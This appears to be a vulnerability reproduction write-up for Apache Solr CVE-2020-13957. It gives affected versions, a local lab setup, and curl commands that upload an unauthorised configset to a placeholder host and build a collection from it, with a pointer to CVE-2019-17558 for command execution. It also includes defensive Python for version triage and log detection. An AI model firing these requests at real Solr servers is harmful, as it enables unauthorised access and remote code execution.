
Apache Solr RCE Unauthorized Upload Vulnerability CVE-2020-13957

Vulnerability Description

In the affected Solr versions, the ConfigSet API allows a configset to be uploaded without authorization; an attacker can use this to achieve remote code execution.

Affected Versions

Apache Solr 6.6.0 - 6.6.5

Apache Solr 7.0.0 - 7.7.3

Apache Solr 8.0.0 - 8.6.2
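As an added example (not from the original post), the following Python checks a Solr version string against the affected ranges listed above, so an inventory of instances can be triaged quickly. The `version_from_system_info` helper assumes the JSON layout of Solr's admin system-info response, with the version under `lucene` -> `solr-spec-version`; the sample payload is constructed.

```python
# Added example: triage a Solr version against the affected ranges above.
# Not part of the original post.
from typing import Tuple

Version = Tuple[int, int, int]

# Inclusive ranges exactly as listed in the post.
AFFECTED_RANGES = [
    ((6, 6, 0), (6, 6, 5)),
    ((7, 0, 0), (7, 7, 3)),
    ((8, 0, 0), (8, 6, 2)),
]


def parse_version(text: str) -> Version:
    """Turn '7.7.0' (or '7.7.0-SNAPSHOT') into a comparable (7, 7, 0) tuple."""
    core = text.strip().split("-", 1)[0]
    parts = core.split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised Solr version string: {text!r}")
    major, minor, patch = (int(p) for p in parts)
    return (major, minor, patch)


def is_affected(version: str) -> bool:
    """True when the version falls inside one of the inclusive affected ranges."""
    v = parse_version(version)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)


def version_from_system_info(payload: dict) -> str:
    """Extract the version from a Solr admin system-info JSON document.

    Assumption: the document carries it under lucene -> solr-spec-version;
    verify the field name against your own instance.
    """
    return payload["lucene"]["solr-spec-version"]


# Constructed sample payload, shaped like a system-info response.
SAMPLE_SYSTEM_INFO = {
    "lucene": {"solr-spec-version": "7.7.0", "lucene-spec-version": "7.7.0"}
}

if __name__ == "__main__":
    v = version_from_system_info(SAMPLE_SYSTEM_INFO)
    print(v, "affected" if is_affected(v) else "not in the affected ranges")
```

Versions are compared as integer tuples rather than strings, so 7.10.x sorts after 7.7.3 correctly; a version outside all three ranges is reported as not affected only with respect to the ranges the post lists.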

Environment Setup

Pick a vulnerable version; this reproduction uses Apache Solr 7.7.0. After downloading it, run the following commands to deploy the environment:

cd solr-7.7.0
./bin/solr start -e cloud -force

Then wait until the startup output shows:

Created collection 'gettingstarted' with 2 shard(s), 2 replica(s) with config-set 'gettingstarted'

Enabling auto soft-commits with maxTime 3 secs using the Config API

POSTing request to Config API: https://localhost:8983/solr/gettingstarted/config
{"set-property":{"updateHandler.autoSoftCommit.maxTime":"3000"}}
Successfully set-property updateHandler.autoSoftCommit.maxTime to 3000


SolrCloud example running, please visit: https://localhost:8983/solr

Visiting https://xxx.xxx.xxx.xxx:8983/solr/ now shows the normal admin interface.

Vulnerability Reproduction

On the attack machine, download the same Solr version and run the following commands to package a configset into a zip archive:

cd solr-7.7.0/server/solr/configsets/sample_techproducts_configs/conf
zip -r - * > vuln.zip


Upload vuln.zip

curl -X POST --header "Content-Type:application/octet-stream" --data-binary @vuln.zip "https://xxx.xxx.xxx.xxx:8983/solr/admin/configs?action=UPLOAD&name=vuln"

The name parameter is the name of the uploaded package (here vuln). Next, use the vulnerability to create a core backed by that configset:

curl "https://xxx.xxx.xxx.xxx:8983/solr/admin/collections?action=CREATE&name=peiqi&numShards=1&replicationFactor=1&wt=xml&collection.configName=vuln"

From there, the Apache Solr Velocity template RCE (CVE-2019-17558) can be used to execute arbitrary commands.
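The two requests in the reproduction above, a configset UPLOAD followed by a collection CREATE whose collection.configName points at the uploaded configset, are the sequence a defender can look for in Solr's request log. The following Python is an added example and not part of the original post: it parses constructed NCSA-style request-log lines (the format Jetty's request log uses when it is enabled for Solr; the addresses, timestamps and sizes are made up) and correlates the two stages per configset name.

```python
# Added example: flag ConfigSet API uploads and collections created from them
# in Solr request-log lines. Not part of the original post.
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in NCSA common log format (what Jetty's request
# log emits when enabled for Solr); not captured from a real system.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2020:09:58:01 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 200 1541
10.0.0.9 - - [12/Oct/2020:09:59:10 +0000] "POST /solr/admin/configs?action=UPLOAD&name=vuln HTTP/1.1" 200 67
10.0.0.9 - - [12/Oct/2020:09:59:32 +0000] "GET /solr/admin/collections?action=CREATE&name=peiqi&numShards=1&replicationFactor=1&wt=xml&collection.configName=vuln HTTP/1.1" 200 412
10.0.0.5 - - [12/Oct/2020:10:01:00 +0000] "GET /solr/gettingstarted/select?q=*:* HTTP/1.1" 200 2210
10.0.0.7 - - [12/Oct/2020:10:02:15 +0000] "GET /solr/admin/collections?action=CREATE&name=logs&collection.configName=gettingstarted HTTP/1.1" 200 398
"""

# client - - [timestamp] "METHOD target PROTOCOL" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line: str) -> Optional[dict]:
    """Split one log line into fields; the query string becomes a dict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qs yields lists; the Solr parameters of interest are single-valued.
    rec["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    return rec


def find_configset_abuse(log_text: str) -> List[dict]:
    """Return findings for configset uploads and for CREATEs that reference them.

    Stage 1: any /solr/admin/configs?action=UPLOAD is recorded by configset name.
    Stage 2: a /solr/admin/collections?action=CREATE whose collection.configName
             matches a recorded upload is reported together with the uploader.
    """
    uploads: Dict[str, dict] = {}
    findings: List[dict] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        q = rec["query"]
        action = q.get("action", "").upper()
        if rec["path"] == "/solr/admin/configs" and action == "UPLOAD":
            name = q.get("name", "")
            uploads[name] = rec
            findings.append({"stage": "upload", "ip": rec["ip"], "configset": name,
                             "status": rec["status"], "ts": rec["ts"]})
        elif rec["path"] == "/solr/admin/collections" and action == "CREATE":
            cfg = q.get("collection.configName", "")
            if cfg in uploads:
                findings.append({"stage": "create_from_upload", "ip": rec["ip"],
                                 "configset": cfg, "collection": q.get("name", ""),
                                 "status": rec["status"], "ts": rec["ts"],
                                 "upload_ip": uploads[cfg]["ip"]})
    return findings


if __name__ == "__main__":
    for f in find_configset_abuse(SAMPLE_LOG):
        print(f)
```

Uploads are reported regardless of HTTP status because a rejected upload (for example after authentication is enabled) is still worth seeing; the CREATE that reuses the gettingstarted configset produces no finding, since that configset was never uploaded through the API in the sampled window.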

This post is licensed under CC BY 4.0 by the author.